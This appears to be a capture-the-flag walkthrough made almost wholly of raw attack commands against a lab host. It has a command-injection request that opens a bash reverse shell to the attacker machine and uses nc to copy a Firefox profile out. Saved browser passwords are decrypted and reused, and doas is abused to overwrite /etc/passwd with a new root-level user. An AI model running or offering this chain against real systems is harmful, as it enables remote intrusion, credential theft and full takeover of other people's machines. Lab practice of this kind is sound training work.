nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
gobuster dir -u http://$VICTIM/api -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
POST /api/items?cmd=require("child_process").exec('bash+-c+"bash+-i+>%26+/dev/tcp/$KALI/1337+0>%261"') HTTP/1.1
Host: 10.10.22.153
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: token=value
Upgrade-Insecure-Requests: 1
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
tar -cvf backup.tar.gz .firefox/
nc -l -p 1234 > backup.tar.gz
nc -w 3 $KALI 1234 < backup.tar.gz
tar xvf backup.tar.gz
git clone https://github.com/unode/firefox_decrypt.git
python3.9 firefox_decrypt/firefox_decrypt.py .firefox/
su v0id
Password: love_the_void
find / -perm -u=s -type f 2> /dev/null
/usr/local/bin/doas -u root cat /root/root.txt
I used doas to read the passwd file, make a backup called passwd.old just in case it broke and passwd.new and added a new user
/usr/local/bin/doas -u root cat /etc/passwd
vi /tmp/passwd.new
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
/usr/local/bin/doas -u root cp /tmp/passwd.new /etc/passwd
su new
Password: 123